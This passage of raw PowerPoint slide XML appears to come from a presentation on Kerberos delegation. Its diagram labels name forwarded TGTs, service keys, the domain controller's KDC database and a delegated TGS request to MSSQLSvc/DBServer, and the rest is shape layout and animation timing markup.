                  <a:spcPts val="500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Forwarded TGT</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="146" name="Picture 1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67688" y="5663800"/>
              <a:ext cx="472016" cy="312696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="149" name="Picture 148"/>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029049" y="5320287"/>
              <a:ext cx="362560" cy="362560"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="133" name="Right Arrow 132"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3282064" y="5733109"/>
              <a:ext cx="143276" cy="170966"/>
            </a:xfrm>
            <a:prstGeom prst="right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de-DE" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="134" name="Picture 1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3896" y="3733974"/>
            <a:ext cx="472016" cy="312696"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="278751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left)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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1"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="131"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="with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4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="144"/>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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14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8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>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84"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="84"/>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85"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="85"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="48" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0 2.22222E-6 L -0.61823 -0.00463 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="92"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-30920" y="-231"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="50" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="131"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13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par>
                                <p:cTn id="58" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -5.55556E-7 -1.11111E-6 L -0.27396 -0.42245 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-13698" y="-21134"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="60" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="61" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="91"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="91"/>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44"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="144"/>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6"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>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47"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="147"/>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148"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="14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28"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12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32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="132"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="84" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="134"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="86" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="134"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="87" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="88" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="5000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="89" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="128"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="90" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="128"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="91" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="5000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="92" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="132"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="132"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="94" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="5000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="95" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="134"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="96" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="134"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="97" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="98" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0"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fade">
                                      <p:cBhvr>
                                        <p:cTn id="10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148" grpId="0"/>
      <p:bldP spid="148" grpId="1"/>
      <p:bldP spid="132" grpId="0"/>
      <p:bldP spid="132" grpId="1"/>
      <p:bldP spid="7"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Kerberos Delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8. Delegated TGS Request, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>skipping TGS_REP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="64" name="Server Large"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="141998" y="1118879"/>
            <a:ext cx="2814102" cy="3318844"/>
            <a:chOff x="-227909" y="3653786"/>
            <a:chExt cx="2814102" cy="3318844"/>
          </a:xfrm>
        </p:grpSpPr>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491" y="3810309"/>
              <a:ext cx="2700684" cy="3162321"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="TextBox 65"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-52060" y="3896416"/>
              <a:ext cx="2562935" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="TextBox 66"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-52060" y="4128242"/>
              <a:ext cx="2562935" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Service Credentials Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>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481" y="4467539"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="TextBox 68"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="671654" y="4526832"/>
              <a:ext cx="1658232" cy="2387833"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Service Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Forwarded TGT Session Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Forwarded TGT</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Ticket-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>Granting</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t> Service Session Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Ticket-Granting Ticket</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>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7909" y="3653786"/>
              <a:ext cx="499308" cy="685686"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="73" name="Picture 7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991" y="2852070"/>
            <a:ext cx="472016" cy="312696"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Picture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1354" y="2421853"/>
            <a:ext cx="362560" cy="362560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="75" name="Group 74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5762801" y="1116830"/>
            <a:ext cx="3209859" cy="2797046"/>
            <a:chOff x="5771714" y="1415706"/>
            <a:chExt cx="3209859" cy="2797046"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="76" name="Picture 7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05578" y="1597989"/>
              <a:ext cx="2973722" cy="2593105"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="TextBox 76"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6671087" y="1698030"/>
              <a:ext cx="1442703" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Domain Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="TextBox 77"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6589790" y="1957026"/>
              <a:ext cx="1612173" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                <a:t>KDC Account Database</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="79" name="Picture 7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83374" y="2303223"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="80" name="TextBox 79"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6763295" y="2363506"/>
              <a:ext cx="1806580"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Service Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>System Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="81" name="Picture 8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71714" y="1415706"/>
              <a:ext cx="628030" cy="741586"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="82" name="Picture 8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19698" y="3450877"/>
              <a:ext cx="761875" cy="761875"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="83" name="Picture 8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78170" y="2812347"/>
              <a:ext cx="351842" cy="351842"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="120" name="Picture 1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6185" y="3298419"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="135" name="Picture 1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52806" y="3293596"/>
            <a:ext cx="348452" cy="348452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="137" name="Picture 1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0402" y="3727189"/>
            <a:ext cx="472016" cy="312696"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="Right Arrow 137"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="832810" y="2922935"/>
            <a:ext cx="143276" cy="170966"/>
          </a:xfrm>
          <a:prstGeom prst="right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de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Right Arrow 139"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3109495" y="1835509"/>
            <a:ext cx="2502616"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8. KRB_TGS_REQ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>MSSQLSvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>DBServer</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" dirty="0">
              <a:ln w="0"/>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3111530" y="2093643"/>
